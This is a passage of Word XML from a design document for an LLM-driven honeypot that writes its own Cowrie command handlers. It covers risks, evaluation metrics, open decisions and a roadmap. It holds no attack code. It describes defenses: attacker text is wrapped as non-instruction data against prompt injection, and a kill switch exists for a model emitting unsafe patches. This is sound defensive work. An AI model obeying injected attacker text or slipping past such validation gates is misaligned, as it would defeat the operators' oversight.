        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-stage attacks span sessions. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A sophisticated attacker reconnoiters in session 1, exploits in session 5. Session-level novelty detection misses this. Plan for source-IP-level (or fingerprint-level) longitudinal tracking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.3 Scripter quality</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hallucinated kernel versions. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"5.15.0-999-generic" doesn't exist. Constrain output to a validated set of (kernel, distro, sshd) tuples via JSON schema enum.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Inconsistent emulation. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A new wget handler reports a different OS than the existing uname handler. Cross-handler consistency checks in the test layer, not the model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fake fs collisions. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Generated /etc/passwd entries that conflict with default Cowrie users break the shell. Merge carefully, prefer additive changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Drift from baseline. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Over many patch cycles, generated handlers may drift toward implausible or over-elaborate behavior. Periodic eval against a held-out realism benchmark.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.4 Operational</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Patch storms. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A burst of distinct unhandled commands can queue many patches at once. Rate-limit main-LLM calls, batch related misses into one patch, and prioritize by the orchestrator's triage score so the queue can't run away.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Log volume. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The honeypot emits cowrie.json. Under a sustained scan that's gigabytes/day even from one instance. Pipe into a real log store (Elasticsearch, ClickHouse), not flat files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source IP correlation. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attackers rotate IPs. Need TLS fingerprints (JA3/JA4), client banner hashes, behavioral fingerprints to correlate sessions across IPs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Legal / ToS. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Running internet-exposed honeypots is legal in most US/EU jurisdictions but check your hosting provider's ToS. Some forbid honeypots, some require disclosure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.5 Evaluation gaps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">"Realism" has no objective metric. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Easy to measure CyberMetric accuracy. Hard to measure "did this fool the attacker." Proxy: session length, depth, payload retrieval rate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Baseline comparison required. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Always run a control Cowrie (state machine frozen) alongside the self-extending one. Without baseline, you can't claim improvement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">A/B per handler. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Some generated handlers may engage attackers worse than a plain error would. Track per-handler engagement metrics and roll back the ones that hurt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.6 Things often forgotten in planning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cold-start. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Day 1 you have no Cowrie corpus. The system must work without it: run only Stage 1–2 (baseline Cowrie + the deterministic prefilter) for an initial ~4-week period, building a corpus before the agentic path comes online.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Re-training cadence. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Threat landscape moves fast. Plan monthly re-training; budget GPU hours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Embeddings staleness. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">New CVEs need new embeddings. Daily incremental ingest, monthly full re-embed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Backups of the honeypot log corpus and the state-machine repo. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This is your most valuable data. Multiple redundant copies, offline at minimum once.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kill switch. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">If the main LLM goes haywire and starts emitting unsafe patches, you need a one-command freeze (stop applying patches) and revert-to-known-good. Build it on day one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11. Evaluation Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.1 Three orthogonal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Axis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Benchmark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Threshold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Knowledge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CyberMetric, SecQA, CTI-MCQ</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&gt;85% on CyberMetric for the main LLM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Safety</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OWASP LLM Top 10, garak, PromptBench</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&gt;0.6 resilience on prompt injection (acknowledging the trade-off)</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Honeypot realism</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Custom: human + LLM-judge rate generated handler output for plausibility on a 1–5 scale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120"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Median ≥4. Side-by-side with hand-written handlers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.2 In-the-wild metrics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Average session length (commands per session) — target: &gt;2x baseline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Distinct novel commands per day captured.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload retrieval rate (% of sessions that result in a downloaded artifact).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Time-to-patch (state-machine miss → validated patch hot-reloaded).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Patch precision (% of generated handlers that subsequently get exercised by an attacker).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Triage precision/recall (% of patched commands that captured something the baseline would have missed; % of flagged misses that were not actually worth patching).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12. Open Questions and Decisions to Make</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Things to resolve before implementation starts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.1 Deployment surface</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cloud VM, on-prem, or hybrid? Affects what TI feeds are reachable, what GPU access looks like.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Public IP per honeypot, or shared IP with port multiplexing? Public IPs attract more diverse traffic but cost more.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Geographic distribution? Attackers behave differently against US vs APAC IPs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.2 LLM hosting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Main LLM: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">self-host on GPU (recommended — the fine-tuned weights are safety-sensitive, and local hosting means lower latency and no data leakage) vs API (simpler ops, but you ship attacker-derived text off-box). Since one model serves both orchestrator and scripter roles, this is a single hosting decision.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Embedding: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">local CPU is fine for bge-small.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.3 Fine-tuning vs. prompt engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">First iteration: try zero-shot Qwen3-8B with strong system prompt + RAG. Measure realism.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fine-tune only if zero-shot can't hit the realism threshold. The safety hit may not be worth it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.4 Detection threshold</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Where on the scanner ↔ skilled attacker continuum do we trigger a patch? Too low → wasted resources and state-machine bloat. Too high → miss novel attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start conservative (high threshold), loosen with deployment data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.5 Handler template library</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pre-built handler templates (file-read, download-and-execute, package manager, service control) the scripter fills in and customizes? Or fully open-ended code generation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Templates are safer and more controllable; open-ended is more adaptive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13. Phased Implementation Roadmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rough sequencing. Each phase should produce a working artifact before moving on.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 1 — Foundation (Weeks 1–3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy Cowrie and instrument the command dispatcher to emit a state-machine miss event for any unhandled command. Validate logs (including misses) flow to a real log store.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Write the Filter (signature-based scanner detection). Drop the obvious 99%.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build the control plane: validate, sandbox-test, version, and hot-reload a state-machine patch. Manually apply hand-written handler patches to validate the mechanism and rollback.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 2 — Security agent &amp; triage (Weeks 4–6)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build the security agent: normalize missed sessions, strip/escape control sequences, and wrap attacker text as delimited non-instruction content. This is the trust boundary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stand up the shared embedding pipeline + vector DB (used by the Stage 2 prefilter and, later, the research agent).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement the orchestrator's triage pass — the when-to-patch criteria from Section 4.3 — starting rule-assisted on captured Phase 1 data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Define the patch schema and stand up the validator agents (schema, static analysis, sandbox replay).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">End-to-end measurement: false-positive rate, latency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 3 — RAG (Weeks 6–9)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ingest CVE / MITRE ATT&amp;CK into Neo4j.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build vector store for threat reports + historical sessions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement hybrid retrieval + reranker and expose it as the research agent's tool.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 4 — Main LLM (Weeks 9–14)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Try zero-shot Qwen3-8B + RAG first. Measure realism.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If insufficient, fine-tune with QLoRA on the layered dataset (Section 6).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wire the model in as orchestrator + scripter behind the security agent, with the validator agents gating output. End-to-end smoke tests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 5 — Production (Weeks 14+)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A/B vs. baseline Cowrie. Tune detection threshold.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monthly re-training loop established.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitoring, alerting, kill switch verified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14. Sources and Further Reading</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.1 Datasets and benchmarks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdcxwafft6fwe2-6kq3hrqs">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CyberLLMInstruct (arxiv 2503.09334)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> — primary dataset, includes the safety-degradation findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
